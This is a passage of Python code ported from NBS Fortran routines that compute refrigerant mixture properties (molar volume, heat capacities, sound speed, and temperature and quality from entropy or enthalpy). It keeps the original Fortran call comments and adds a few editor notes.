VB43\t\t\t\t\t\t\\\n\t\t\t\t+ ((1.0 / VB + VBL / B) * (A * BData.D2BDT * B \t\\\n\t\t\t\t+ 2.0 * (BData.DADT * BData.DBDT * B - A * D12)) / B\t\\\n\t\t\t\t- BData.D2ADT * VBL - A * D12 / (VB **2)) / B) * T - BData.R\n\n\t\t\tfor I in range(1, BData.NC + 1): # DO 160 I = 1,BData.NC - python fix: the range started at 0 instead of 1\n\t\t\t\tCV = CV + X[I] * BData.CP[I]\n\n\t\t\tif (IQ == 3 or IQ == 5):\n\t\t\t\t# COMPUTE SPECIFIC HEAT AT CONSTANT PRESSURE USING CV\n\t\t\t\tY = B4 / V\n\t\t\t\tDPDT = 2.0 * BData.R / VB4 * ( - 1.0 + ( - 0.25 * T * BData.DBDT + (V * V * (1.0 + 0.75 * T * BData.DBDT / VB4))\t\t\\\n\t\t\t\t\t/ VB4) / VB4) + (BData.R + ( - BData.DADT + A * BData.DBDT / VB) / VB) / V\n\n\t\t\t\t#DPDV = ( - RT * (1.0 + (4.0 + (4.0 + ( - 4.0 + Y) * Y) * Y) * Y) / (pow(1.0 - Y,4))\t\\\n\t\t\t\t#\t+ A * (2.0 * V + B) / (VB *VB)) / (V * V )\n\t\t\t\t\t\n\t\t\t\tDPDV = ( - RT * (1.0 + (4.0 + (4.0 + ( - 4.0 + Y) * Y) * Y) * Y) / ( (1.0 - 
Y)**4 )\t\\\n\t\t\t\t\t+ A * (2.0 * V + B) / (VB *VB)) / (V * V )\n\n\t\t\t\tCP = CV - DPDT * DPDT * T / DPDV\n\t\t\t\t\n\t\t\t\t# COMPUTE VELOCITY OF SOUND USING C'S AND VOLUME DERIVATIVE OF P\n\t\t\t\tWMOL = 0.0\n\t\t\t\tfor I in range(1, BData.NC+1 ): # DO 180 I = 1,BData.NC\n\t\t\t\t\tWMOL = WMOL + X[I] * BData.WM[I]\n\t\t\t\t\n\t\t\t\tVS = V * math.sqrt( - 1000.0 * CP * DPDV / (WMOL * CV))\n\n\t\treturn [H, CV, CP, VS]\n\n\t# = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . \n\tdef vit (self, T, P, para_A, para_B, VS, LLIQI): # VS, LVCON\n\t\t# [P5, P7] = self.vit (P1, P2, P3, P4, P5, P6)\n\t\t#\t\t SUBROUTINE VIT (T,P,para_A,para_B,VS,LLIQI,LVCON)\n\t\t#\n\t\t# DEVELOPED BY MARK MCLINDEN AND GRAHAM MORRISON AT THE\n\t\t# NATIONAL BUREAU OF STANDARDS UNDER FUNDING FROM THE ELECTRIC\n\t\t# POWER RESEARCH INSTITUTE AND NBS.\n\t\t#\n\t\t# GIVEN TEMPERATURE, PRESSURE, AND EQUATION OF STATE\n\t\t# PARAMETERS, THIS ROUTINE CALCULATES THE LIQUID OR VAPOR\n\t\t# MOLAR VOLUME THAT SATISFIES THE EQUATION OF STATE.\n\t\t#\n\t\t# INPUTS:\n\t\t# T - TEMPERATURE (K)\n\t\t# P - PRESSURE (KPA)\n\t\t# para_A,para_B - EQUATION OF STATE PARAMETERS AT TEMPERATURE T\n\t\t# VS - INITIAL GUESS FOR VOLUME. IN ABSENCE OF BETTER\n\t\t# GUESSES SUGGESTED VALUES ARE:\n\t\t# LIQUID: VS = 0.8 * para_B\n\t\t# VAPOR: VS = R * T / P\n\t\t# LLIQI - LOGICAL VARIABLE\n\t\t# if LLIQI = True COMPUTE LIQUID VOLUME\n\t\t# if LLIQI = False COMPUTE VAPOR VOLUME\n\t\t# NOTE: if EITHER THE TEMPERATURE OR THE PRESSURE IS ABOVE\n\t\t# THE CRITICAL VALUE, ONLY ONE SOLUTION EXISTS AND THE\n\t\t# VALUE OF LLIQI HAS NO EFFECT.\n\t\t#\n\t\t# OUTPUTS:\n\t\t# VS - MOLAR VOLUME (M * * 3 / KG MOL)\n\t\t# LVCON - ERROR FLAG; if LVCON = True THE ITERATION HAS\n\t\t# NOT CONVERGED\n\t\t#\n\t\t# OTHER SUBROUTINES REFERENCED:\n\t\t# NONE\n\t\t#\n\t\t# (FOR EXPLANATION OF NOMENCLATURE SEE BUBLT)\n\t\t#\n\t\t# NOTE: THIS ROUTINE IS WRITTEN IN DOUBLE PRECISION EXCEPT\n\t\t# THAT THE ARGUMENTS ARE SINGLE PRECISION\n\t\t#\n\t\t#\t IMPLICIT DOUBLE PRECISION (para_A - H,O - Z)\n\t\t#\t LOGICAL LLIQ,LVCON,LLIQI\n\t\t#\t REAL T,P, para_A, para_B, R, VS, TOLR, TC, PC\n\t\t#\t COMMON / RDATA4 / R\n\t\t#\t COMMON / TOL / TOLR,ITMAX,LUP\n\t\t\n\t\tif para_B <= 0 or VS <=0:\n\t\t\tprint (\"vit : bad input parameter, B <= 0, B=\",para_B)\n\t\t\tprint (\"vit : bad input parameter, VS <= 0, VS=\",VS)\n\t\t\tprint (\" input Temperature(K) =\", T, \" pressure(kPa)=\", P )\n\t\t\tprint ('Application terminated in python\\n')\n\t\t\tsys.exit()\t#('1020') - python fix: 'sys.exit' was a bare reference and never actually exited\n\t\t\t\n\t\tLVCON = False\n\t\tLLIQ = LLIQI\n\t\tV = VS\n\t\t\t\t\n\t\tVL = math.log(V)\n\t\tPL = math.log(P)\n\t\tRT = BData.R * T\n\t\tB4 = 0.25 * para_B\n\t\t\n\t\tB4L = math.log(B4)\n\t\t\t\n\t\tif (VL < B4L):\n\t\t\tVL = B4L + 0.5\n\t\t\n\t\t\n\t\tTC = para_A / (para_B * 4.398909 * BData.R)\n\n\t\tPC = 0.02386944 * para_A / pow(para_B, 2)\n\n\t\tVCL = math.log(12.0272727 * B4)\n\n\t\tif (P > PC) :\n\t\t\tLLIQ = True\n\t\telif (T > TC) :\n\t\t\tLLIQ = False\n\n\t\t#\n\t\t# ENTER NEWTONS METHOD ITERATION FOR VOLUME. FOR LIQUIDS\n\t\t# (OR FLUIDS ABOVE THE CRITICAL PRESSURE) THE ITERATION\n\t\t# IS CARRIED OUT IN TRANSFORMED COORDINATES OF LOG (V). FOR\n\t\t# VAPOR (OR FLUIDS AT SUPERCRITICAL TEMPERATURES BUT PRESSURES\n\t\t# BELOW THE CRITICAL VALUE) THE ITERATION IS IN TERMS OF\n\t\t# LOG (V) AND LOG (P). 
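\n\t\t# [python editor note] iterating on LOG(V) keeps the trial volume\n\t\t# positive, and for the vapor branch matching LOG(P2) against LOG(P)\n\t\t# makes the Newton step FVDPL = (LOG(P2) - PL)*P2/DPDLV roughly\n\t\t# scale-invariant in pressure.\n\t\t# 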
THE ITERATION HAS CONVERGED WHEN\n\t\t# THE PRESSURE CALCULATED FROM THE EQUATION OF STATE AGREES\n\t\t# WITH THE INPUT PRESSURE.\n\t\t#\n\t\tfor IT in range(1, BData.ITMAX + 1 ): # DO 100 IT = 1,ITMAX\n\t\t\tif ( ( (VL > VCL) == LLIQ ) and P < PC):\n\t\t\t\tVL = VCL\n\t\t\tVLS = VL\n\t\t\tY = B4 / V\n\t\t\tVB = V + para_B\n\t\t\t#\n\t\t\t# CALCULATE PRESSURE AS para_A FUNCTION OF VOLUME AND THE\n\t\t\t# DERIVATIVE OF THE PRESSURE W.R.T. LOG (VOLUME).\n\t\t\t#\n\t\t\tP2=( RT * (1.0+(1.0+(1.0-Y)*Y)*Y) / (1.0-Y)**3-para_A/VB)/V\n\t\t\tDPDLV = RT / V * ( - 1.0 + ( - 4.0 + ( - 4.0 + (4.0 - Y) * Y) * Y) * Y) / ( pow (1.0 - Y, 4) )\t\\\n\t\t\t\t\t+ para_A * (2.0 * V + para_B) / (V * VB * VB)\n\n\t\t\tif (LLIQ) :\n\t\t\t\tif (DPDLV >= 0.0) :\n\t\t\t\t\tVL = 0.5 * (B4L + VLS)\n\t\t\t\telse:\n\t\t\t\t\tFVDP = (P2 - P) / DPDLV\n\t\t\t\t\t# python note: the Fortran used 0.001 * TOLR here; that looked unattainably tight, so TOLR is used below\n\t\t\t\t\t#if (abs(FVDP / P) < 0.001 * BData.TOLR) :\n\t\t\t\t\tif (abs(FVDP / P) < BData.TOLR) :\n\t\t\t\t\t\tVS = math.exp(VL)\n\t\t\t\t\t\treturn [VS, LVCON]\n\t\t\t\t\telse:\n\t\t\t\t\t\tVL = VL - FVDP\n\t\t\t\t\t\tif (VL <= B4L):\n\t\t\t\t\t\t\tVL = 0.5 * (B4L + VLS)\n\t\t\telse:\n\t\t\t\tif (DPDLV >= 0.0 or P2 <= 0.0) :\n\t\t\t\t\tVL = VL + 0.5\n\t\t\t\telse:\n\t\t\t\t\tFVDPL = (math.log(P2) - PL) * P2 / DPDLV\n\t\t\t\t\tif (abs(FVDPL) < 0.001 * BData.TOLR) :\n\t\t\t\t\t\tVS = math.exp(VL)\n\t\t\t\t\t\treturn\t[VS, LVCON]\n\n\t\t\t\t\tVL = VL - FVDPL\n\t\t\t\t\tif (abs(VL - VLS) > 1.5):\n\t\t\t\t\t\t#----------------------------------------------\n\t\t\t\t\t\tif VL >= VLS :\t#VL = VLS + SIGN(1.0D0,VL - VLS)\n\t\t\t\t\t\t\tVL = VLS + 1\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tVL = VLS - 1\n\t\t\t\t\t\t#----------------------------------------------\n\t\t\t\t\tif (VL < VCL):\n\t\t\t\t\t\tVL = 0.5 * (VLS + VCL)\n\t\t\tV = math.exp(VL)\n\t\t\t# end of loop 100 ==================== CONTINUE\n\t\tLVCON = True\n\t\tVS = V\n\t\treturn [VS, LVCON]\n\n\t# = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . \n\tdef spxsp (self, S,P,X, TSAT,SSAT,VSAT, LLIQ) : # ,T2,V,LLIQ\n\t\t# [T2,V] = spxsp (self, S,P,X,TSAT,S ,LLIQ)\n\t\t#\t[p4,p8]= self.spxsp(p1 to p6, p9)\n\t\t# SUBROUTINE SPXSP (S,P,X, TSAT,SSAT,VSAT, T2,V,LLIQ)\n\t\t#\n\t\t# SUBROUTINE TO ITERATE FOR THE TEMPERATURE OF A SINGLE PHASE\n\t\t# BINARY MIXTURE GIVEN ENTROPY, PRESSURE, AND COMPOSITION.\n\t\t# CALLED ONLY BY SPIN.\n\n\t\t# COMMON / TOL / TOLR,ITMAX,LUP\n\t\t# COMMON / TOLSH / TOLH,TOLS\n\t\t\n\t\tLVCON = False\n\n\t\tT1 = TSAT\n\t\tFT1 = S - SSAT\n\n\t\t#[P5, P6, P7, P8] = self.hcvcps (P1, P2, P3, P4)\n\t\t[HSAT, CV, CP, VSND] = self.hcvcps (4, T1, VSAT, X ) # CALL HCVCPS (4,T1,VSAT,X, HSAT,CV,CP,VSND)\n\n\t\tSSAT = self.entrop (T1,VSAT,X)\n\t\tT2 = TSAT + FT1 / CV\n\t\tV = VSAT\n\n\t\tfor IT in range(1, BData.ITMAX + 1 ): # DO 200 IT = 1,ITMAX\n\t\t\t# [P4, P5] = self.espar [P1, P2, P3]\n\t\t\t[A, B] = self.espar (2, T2, X )\t\t\t\t\t#CALL espar (2,T2,X, A, B)\n\t\t\t#[P5, P7] = self.vit (P1, P2, P3, P4, P5, P6)\n\t\t\t[V, LVCON] = self.vit (T2, P, A, B, V, LLIQ)\t# CALL VIT (T2,P, A, B,V, LLIQ,LVCON)\n\n\t\t\tSSP = self.entrop (T2,V,X)\n\t\t\tFT2 = S - SSP\n\t\t\tif (abs(FT2) < BData.TOLS or abs(FT2 - FT1) < 0.02 * BData.TOLS):\n\t\t\t\treturn [T2, V]\n\n\t\t\tT3 = T2 - FT2 * (T2 - T1) / (FT2 - FT1)\n\t\t\tT1 = T2\n\t\t\tT2 = T3\n\t\t\tFT1 = FT2\n\n\t\tprint (BData.LUP, 'SINGLE PHASE ITERATION IN SPIN DID NOT CONVERGE' )\n\t\treturn [T2, V]\n\n\t# = . = . = . = . = . = . = . = . = . = . = . = . = . 
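\n\t# [python editor note] spxsp above and hpxsp below are the same secant\n\t# scheme applied to different target properties (entropy vs. enthalpy).\n\t# A hedged, standalone sketch of that shared pattern - the name and the\n\t# prop_of_T callback are illustrative, not part of the original Fortran:\n\tdef single_phase_secant_sketch (self, target, prop_of_T, T1, T2, tol):\n\t\t'''Illustrative only: secant on T until prop_of_T(T) matches target.'''\n\t\tFT1 = target - prop_of_T(T1)\n\t\tfor IT in range(1, BData.ITMAX + 1):\n\t\t\tFT2 = target - prop_of_T(T2)\n\t\t\tif (abs(FT2) < tol or abs(FT2 - FT1) < 0.02 * tol):\n\t\t\t\treturn T2\n\t\t\tT3 = T2 - FT2 * (T2 - T1) / (FT2 - FT1)\n\t\t\tT1 = T2\n\t\t\tT2 = T3\n\t\t\tFT1 = FT2\n\t\treturn T2\n\n\t# 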
= . = . = . = . = . = . \n\tdef hpxsp (self,H, P, X, TSAT, HSAT, VSAT, LLIQ): # T2,V, LLIQ\n\t\t# [T2,V] = self.hpxsp (H,P,X, TSAT, LLIQ)\n\t\t# [P7,P8] = self.hpxsp (P1,P2,P3, P4,P5,P6, P9 )\n\t\t#\t\t SUBROUTINE HPXSP (H,P,X, TSAT,HSAT,VSAT, T2,V,LLIQ)\n\t\t#\n\t\t# SUBROUTINE TO ITERATE FOR THE TEMPERATURE OF A SINGLE PHASE\n\t\t# BINARY MIXTURE GIVEN ENTHALPY, PRESSURE, AND COMPOSITION.\n\t\t# CALLED ONLY BY HPIN.\n\t\t\n\t\t#\t IMPLICIT REAL (A-H,O-Z)\n\t\t#\t DIMENSION X(5)\n\t\t#\t LOGICAL LLIQ,LVCON\n\t\t#\t COMMON /TOL/ TOLR,ITMAX,LUP\n\t\t#\t COMMON /TOLSH/ TOLH,TOLS\n\t\t\n\t\t\n\t\tT1 = TSAT\n\t\tFT1 = H - HSAT\n\t\t\n\t\t#[P5, P6, P7, P8] = self.hcvcps (P1, P2, P3, P4)\n\t\t[HSAT, CV, CP, VSND] = self.hcvcps ( 5, T1, VSAT, X ) # CALL HCVCPS (5,T1,VSAT,X, HSAT ,CV,CP,VSND)\n\n\t\tT2 = TSAT + FT1 / CP\n\t\tV = VSAT\n\n\t\tfor IT in range (1, BData.ITMAX + 1) : # DO 200 IT=1,ITMAX\n\t\t\t# [P4, P5] = self.espar [P1, P2, P3]\n\t\t\t[A, B] = self.espar(2, T2, X ) #CALL espar (2,T2,X,A,B)\n\t\t\t\n\t\t\t#[P5, P7] = self.vit (P1, P2, P3, P4, P5, P6)\n\t\t\t[V, LVCON ] = self.vit (T2,P,A,B,V, LLIQ)\t#CALL VIT (T2,P,A,B,V, LLIQ,LVCON)\n\t\t\t\n\t\t\t#[P5, P6, P7, P8] = self.hcvcps (P1, P2, P3, P4)\n\t\t\t[HSP, CV, CP, VSND] = self.hcvcps ( 1, T2, V, X ) \t# CALL HCVCPS (1,T2,V,X, HSP,CV,CP,VSND)\n\n\t\t\tFT2 = H - HSP\n\t\t\t\n\t\t\tif (abs(FT2) < BData.TOLH or abs(FT2-FT1) < 0.02 * BData.TOLH):\n\t\t\t\treturn [T2,V]\n\n\t\t\tT3 = T2 - FT2 * (T2-T1) / (FT2-FT1)\n\t\t\tT1 = T2\n\t\t\tT2 = T3\n\t\t\tFT1 = FT2\n\n\t\tprint (BData.LUP,'SINGLE PHASE ITERATION IN HPIN DID NOT CONVERGE')\n\t\treturn [T2,V]\n\n\t# = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . = . \n\tdef spin (self, S,P,X ): # T,XQ,XL,XV,VL,VV,SL,SV\n\t\t# [P4 .. P11] = self.spin (P1, P2, P3 )\n\t\t# [T,XQ,XL,XV,VL,VV,SL,SV] = self.spin (self, S,P,X )\n\t\t#\t SUBROUTINE SPIN (S,P,X,T,XQ,XL,XV,VL,VV,SL,SV)\n\t\t#\n\t\t# DEVELOPED BY MARK MCLINDEN AND GRAHAM MORRISON AT THE\n\t\t# NATIONAL BUREAU OF STANDARDS WITH FUNDING FROM THE ELECTRIC\n\t\t# POWER RESEARCH INSTITUTE AND NBS.\n\t\t#\n\t\t# THIS ROUTINE CALCULATES THE TEMPERATURE AND QUALITY OF .A SINGLE\n\t\t# OR TWO - PHASE MIXTURE GIVEN THE PRESSURE AND THE OVERALL (BULK)\n\t\t# ENTROPY AND COMPOSITION\n\t\t#\n\t\t# INPUTS:\n\t\t# S - ENTROPY (KJ / KMOL K) OF BULK MIXTURE\n\t\t# P - PRESSURE (KPA)\n\t\t# X - BULK COMPOSITION (MOLE FRACTION)\n\t\t#\n\t\t# OUTPUTS:\n\t\t# T - EQUILIBRIUM TEMPERATURE OF SYSTEM (K)\n\t\t# XQ - EQUILIBRIUM QUALITY (MOLAR BASIS), NEGATIVE VALUES INDICATE\n\t\t# SUBCOOLED LIQUID. 
QUALITIES > 1 INDICATE SUPERHEATED VAPOR.\n\t\t# NOTE: THE QUALITIES COMPUTED FOR SINGLE PHASE CONDITIONS IN\n\t\t# THE ROUTINES HPIN, HTIN, SPIN, AND VTIN WILL NOT BE THE SAME.\n\t\t# XL - COMPOSITION OF LIQUID PHASE (MOLE FRACTION)\n\t\t# XV - COMPOSITION OF VAPOR PHASE (MOLE FRACTION)\n\t\t# VL - MOLAR VOLUME OF LIQUID PHASE (M**3/KMOL)\n\t\t# VV - MOLAR VOLUME OF VAPOR PHASE (M**3/KMOL)\n\t\t# SL - MOLAR ENTROPY OF LIQUID PHASE (KJ/KMOL K)\n\t\t# SV - MOLAR ENTROPY OF VAPOR PHASE (KJ/KMOL K)\n\t\t# NOTE: if ONLY SUBCOOLED LIQUID IS PRESENT, VV AND SV ARE\n\t\t# COMPUTED AT THE BUBBLE POINT TEMPERATURE AND VAPOR COMPOSITION\n\t\t# IN EQUILIBRIUM WITH SATURATED LIQUID AT THE GIVEN P, XL.\n\t\t# if ONLY SUPERHEATED VAPOR IS PRESENT, VL AND SL ARE\n\t\t# COMPUTED AT THE DEWPOINT TEMPERATURE AND LIQUID\n\t\t# COMPOSITION IN EQUILIBRIUM WITH SATURATED VAPOR AT THE\n\t\t# GIVEN P, XV.\n\t\t#\n\t\t#\t IMPLICIT REAL (BData.A - H,O - Z)\n\t\t#\t LOGICAL LCRIT,LCONV\n\t\t#\t DIMENSION X(5),XL(5),XV(5),XLB(5),XVB(5),XLD(5),XVD(5)\n\t\t#\t COMMON / NCOMP / BData.NC\n\t\t#\t COMMON / TOL / TOLR,ITMAX,LUP\n\t\t#\t COMMON / TOLSH / TOLH,TOLS\n\t\t#\n\t\t# COMPUTE BUBBLE AND DEW POINTS AT GIVEN CONDITIONS OF P AND X\n\t\t#\n\t\tLCRIT = False\n\t\tLCONV = False\n\t\tT=0.0\n\t\tXL = [0.0] * (5+1)\n\t\tXV = [0.0] * (5+1)\n\n\t\tXLB= [0.0] * (5+1)\n\t\tXVB= [0.0] * (5+1)\n \n\t\tXLD= [0.0] * (5+1)\n\t\tXVD= [0.0] * (5+1)\n\t\t\n\t\t\n\t\t# [P2, P3 ,P4, P5, P6, P8] = self.bublp (P1, P2, P3 , P7 )\n\t\t[_, XV, TBUB, VL, VVBUB, LCRIT] = self.bublp ( P, X, XV, True) \t# CALL BUBLP (P,X,XV, TBUB, VL, VVBUB, True,LCRIT) \n\t\t[XL,_, TDEW, VLDEW, VV, LCRIT] = self.bublp ( P, XL, X, False)\t# CALL BUBLP (P,XL,X, TDEW,VLDEW,VV, False ,LCRIT)\n\t\t\n\t\tVLBUB = VL # in Python only\n\t\t\n\t\tSL = self.entrop (TBUB, VL, X)\n\t\tSV = self.entrop (TDEW, VV, X)\n\t\t\n\t\t# WRITE ( * , * ) 'TBUB,TDEW,SLBUB,SVDEW ',TBUB,TDEW,SL,SV\n\t\tif (S <= SL) :\n\t\t\t# SINGLE PHASE LIQUID\n\t\t\t#\n\t\t\tXL = X[:]\n\t\t\t#for I in range(1, BData.NC + 1): # DO 120 I = 1,BData.NC\n\t\t\t#\tXL[I] = X[I]\n\t\t\t\t\n\t\t\tVV = VVBUB\n\t\t\tVLBUB = VL\n\t\t\t#[p7,p8,p9]= self.spxsp(p1 to p6)\n\t\t\t[T,VL]= self.spxsp(S,P,X, TBUB,SL,VLBUB, True)\n\t\t\t#CALL SPXSP (S,P,X, TBUB,SL,VLBUB, T,VL, .TRUE.)\n\t\t\t\t\n\t\telif (S >= SV) :\n\t\t\t# SINGLE PHASE VAPOR\n\t\t\t#\n\t\t\tXV = X[:]\n\t\t\t#for I in range(1,BData.NC): # DO 140 I = 1,BData.NC\n\t\t\t#\tXV[I] = X[I]\n\t\t\t\t\n\t\t\tVL = VLDEW\n\t\t\tVVDEW = VV\n\t\t\t\n\t\t\t[T,VV]= self.spxsp(S,P,X, TDEW,SV,VVDEW, False)\n\t\t\t# CALL SPXSP (S,P,X, TDEW,SV,VVDEW, T,VV,.FALSE.)\n\t\t\t\n\t\telse:\n\t\t\t# TWO PHASE\n\t\t\t#\n\t\t\tNCC = BData.NC\n\t\t\tfor I in range(1, BData.NC + 1): # DO 210 I = 1,BData.NC\n\t\t\t\tif (X[I] < BData.TOLR):\n\t\t\t\t\tNCC = NCC - 1\n\t\t\t\t\t\n\t\t\t\tXLB[I] = X[I]\n\t\t\t\tXVB[I] = XV[I]\n\t\t\t\tXLD[I] = XL[I]\n\t\t\t\tXVD[I] = X[I]\n\t\t\t\t#210 CONTINUE\n\t\t\t\t\n\t\t\tSLB = SL\n\t\t\tSVD = SV\n\t\t\tSVB = self.entrop (TBUB,VVBUB,XVB)\n\t\t\tSLD = self.entrop (TDEW,VLDEW,XLD)\n\t\t\t\n\t\t\tb_python_flag = False\n\t\t\tfor IT in range(1, int(BData.ITMAX/2) + 1):\t# DO 260 IT = 1,ITMAX / 2\n\t\t\t\t#\n\t\t\t\t# COMPUTE QUALITY BASED ON ENTROPY; COMPUTED SEPARATELY FOR\n\t\t\t\t# BUBBLE AND DEW POINT CONDITIONS.\n\t\t\t\t#\n\t\t\t\tXQSB = (S - SLB) / (SVB - SLB)\n\t\t\t\tXQSD = (S - SLD) / (SVD - SLD)\n\t\t\t\t#\n\t\t\t\t# COMPUTE LENGTH OF TIE LINE CONNECTING LIQUID AND VAPOR\n\t\t\t\t# 
COMPOSITIONS AND QUALITIES BASED ON COMPOSITION.\n\t\t\t\t#\n\t\t\t\tIXQCB = 0\n\t\t\t\tIXQCD = 0\n\t\t\t\tXQCB = 0.0\n\t\t\t\tXQCD = 0.0\n\t\t\t\tTLINEB = 0.0\n\t\t\t\tTLINED = 0.0\n\t\t\t\t\n\t\t\t\tfor I in range(1, BData.NC + 1): # DO 214 I = 1,BData.NC\n\t\t\t\t\tif (XLB[I] != XVB[I]):\n\t\t\t\t\t\tIXQCB = IXQCB + 1\n\t\t\t\t\t\tXQCB = XQCB + ( X[I] - XLB[I] ) / ( XVB[I] - XLB[I] )\n\t\t\t\t\t\n\t\t\t\t\tTLINEB = TLINEB + ( XVB[I] - XLB[I] ) **2\n\t\t\t\t\t\n\t\t\t\t\tif (XLD[I] != XVD[I] ) :\n\t\t\t\t\t\tIXQCD = IXQCD + 1\n\t\t\t\t\t\tXQCD = XQCD + ( X[I] - XLD[I] ) / ( XVD[I] - XLD[I] )\n\t\t\t\t\t\n\t\t\t\t\tTLINED = TLINED + (XVD[I] - XLD[I] ) **2\n\t\t\t\t\t#214 CONTINUE\n\t\t\t\t\t\n\t\t\t\tif (IXQCB > 0) :\n\t\t\t\t\t#XQCB = XQCB / REAL(IXQCB)\n\t\t\t\t\tXQCB = XQCB / (IXQCB + 0.0)\n\t\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\tXQCB = XQSB\n\t\t\t\t\n\t\t\t\tif (IXQCD > 0):\n\t\t\t\t\t#XQCD = XQCD / REAL(IXQCD)\n\t\t\t\t\tXQCD = XQCD / (IXQCD + 0.0)\n\t\t\t\telse:\n\t\t\t\t\tXQCD = XQSD\n\t\t\t\t\n\t\t\t\tTLINEB = math.sqrt(TLINEB)\n\t\t\t\tTLINED = math.sqrt(TLINED)\n\t\t\t\t#\n\t\t\t\t# CHECK FOR CONVERGENCE\n\t\t\t\t#\n\t\t\t\tLCONV = True\n\t\t\t\tfor I in range(1, BData.NC + 1): # DO 220 I = 1,BData.NC\n\t\t\t\t\tif ( abs ( XVB[I] - XVD[I] ) > 0.0001):\n\t\t\t\t\t\tLCONV = False\n\t\t\t\t\t\n\t\t\t\tif (abs(XQCB - XQSB) > 0.0001):\n\t\t\t\t\tLCONV = False\n\t\t\t\t\t\n\t\t\t\tif (abs(XQCD - XQSD) > 0.0001):\n\t\t\t\t\tLCONV = False\n\t\t\t\t\t\n\t\t\t\tif (LCONV):\n\t\t\t\t\tb_python_flag = True\n\t\t\t\t\tbreak\t# GOTO 280\n\t\t\t\t#\n\t\t\t\t# ASSIGN WEIGHTS TO BUBBLE AND DEW POINT CALCULATION\n\t\t\t\t#\n\t\t\t\tif (IT <= 1 or NCC <= 2) :\n\t\t\t\t\tWTB = 1.0 + (XQCB - XQSB) / ((XQCD - XQSD) - (XQCB - XQSB))\n\t\t\t\t\tWTD = 1.0 - (XQCD - XQSD) / ((XQCD - XQSD) - (XQCB - XQSB))\n\t\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\tDTSUMB = 0.0\n\t\t\t\t\tDTSUMD = 0.0\n\t\t\t\t\t\n\t\t\t\t\tfor J in range(1, (BData.NC-1) + 1): \t\t# DO 222 J = 1,BData.NC - 1\n\t\t\t\t\t\tfor K in range( J+1 , BData.NC +1 ):\t\t# DO 222 K = J + 1,BData.NC\n\t\t\t\t\t\t\tDTSUMB = DTSUMB + ( ( X[J] - XLB[J] ) * ( XVB[K] - XLB[K] ) \t\\\n\t\t\t\t\t\t\t\t- ( X[K] - XLB[K] ) * ( XVB[J] - XLB[J] ) ) ** 2\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\t\tDTSUMD = DTSUMD + ( ( X[J] - XLD[J] ) * ( XVD[K] - XLD[K] )\t\t\\\n\t\t\t\t\t\t\t\t- ( X[K] - XLD[K] ) * ( XVD[J] - XLD[J] ) ) ** 2\n\t\t\t\t\t\t\t# 222 CONTINUE\n\t\t\t \n\t\t\t\t\tDXBUB = 0.0\n\t\t\t\t\tDXDEW = 0.0\n\t\t\t\t\t\n\t\t\t\t\tfor I in range( 1, BData.NC +1 ): # DO 223 I = 1,BData.NC\n\t\t\t\t\t\tDXBUB = DXBUB + ( XLB[I] - XVB[I]) ** 2\n\t\t\t\t\t\tDXDEW = DXDEW + ( XLD[I] - XVD[I]) ** 2\n\t\t\t \n\t\t\t\t\tDXBUB = math.sqrt(DTSUMB / DXBUB)\n\t\t\t\t\tDXDEW = math.sqrt(DTSUMD / DXDEW)\n\t\t\t\t\t\n\t\t\t\t\tWTB = DXDEW / (DXDEW + DXBUB)\n\t\t\t\t\tWTD = DXBUB / (DXBUB + DXDEW)\n\t\t\t\t#END if\n\n\t\t\t\tif (TLINEB / TLINED > 2.0 or TLINEB / TLINED < 0.5) :\n\t\t\t\t\tTLAVG = min(TLINEB, TLINED)\n\t\t\t\t\t\n\t\t\t\telse:\n\t\t\t\t\tTLAVG = (WTB * TLINEB + WTD * TLINED)\n\t\t\t\t\n\t\t\t\t#\n\t\t\t\t# COMPUTE NEXT GUESSES FOR COMPOSITION OF LIQUID AND VAPOR\n\t\t\t\t# AND CARRY OUT CORRESPONDING BUBBLE AND DEW POINT CALCULATIONS.\n\t\t\t\t#\n\t\t\t\t\n\t\t\t\tfor I in range(1, BData.NC + 1): # DO 224 I = 1,BData.NC\n\t\t\t\t\tXLB2I = X[I] + TLAVG * (WTB * XQSB + WTD * XQSD)\t\\\n\t\t\t\t\t\t* (WTB * (XLB[I] - XVB[I]) / TLINEB + WTD * (XLD[I] - XVD[I]) / TLINED)\n\t\t\t\t\t\t\n\t\t\t\t\tXVD2I = X[I] - TLAVG * (WTB * (1.0 - XQSB) + WTD * (1.0 - XQSD))\t\\\n\t\t\t\t\t\t* (WTB 
* (XLB[I] - XVB[I]) / TLINEB + WTD * (XLD[I] - XVD[I]) / TLINED)\n\t\t\t\t \n\t\t\t\t\tXLB[I] = XLB2I\n\t\t\t\t\tXVD[I] = XVD2I\n\t\t\t\t\t# 224 CONTINUE\n\t\t\t\t\n\t\t\t\t# [P2, P3 ,P4, P5, P6, P8] = self.bublp (P1, P2, P3 , P7 )\n\t\t\t\t[_, XVB, TBUB, VLBUB, VVBUB, LCRIT] = self.bublp ( P, XLB, XVB, True) # CALL BUBLP (P,XLB,XVB, TBUB,VLBUB,VVBUB, True, LCRIT)\n\t\t\t\t[XLD, _, TDEW, VLDEW, VVDEW, LCRIT] = self.bublp ( P, XLD, XVD, False)# CALL BUBLP (P,XLD,XVD, TDEW, VLDEW,VVDEW, False ,LCRIT)\n\t\t\t\t\n\t\t\t\tSLB = self.entrop (TBUB,VLBUB, XLB)\n\t\t\t\tSVB = self.entrop (TBUB,VVBUB, XVB)\n\t\t\t\tSLD = self.entrop (TDEW,VLDEW, XLD)\n\t\t\t\tSVD = self.entrop (TDEW,VVDEW, XVD)\n\n\t\t\t\t# 260 CONTINUE\n\t\t\t\t\n\t\t\t# WRITE (LUP,1000) S,P, (X(I),I = 1,BData.NC)\n\t\t\tif not b_python_flag :\n\t\t\t\tprint (BData.LUP, \"ROUTINE SPIN DID NOT CONVERGE; S, P, X:\",S, P, X[1:BData.NC + 1] )\n\t\t\t\n\t\t\t# 280\tCONTINUE\n\t\t\t\n\t\t\t#\n\t\t\t# SOLUTION HAS CONVERGED; WRITE OUTPUT VARIABLES.\n\t\t\t#\n\t\t\tXL = XLB[:]\n\t\t\tXV = XVB[:]\n\t\t\t\n\t\t\t#for I in range(1,BData.NC): # DO 284 I = 1,BData.NC\n\t\t\t#\tXL[I] = XLB[I]\n\t\t\t#\tXV[I] = XVB[I]\n\t\t\n\t\t\tVL = VLBUB\n\t\t\tVV = 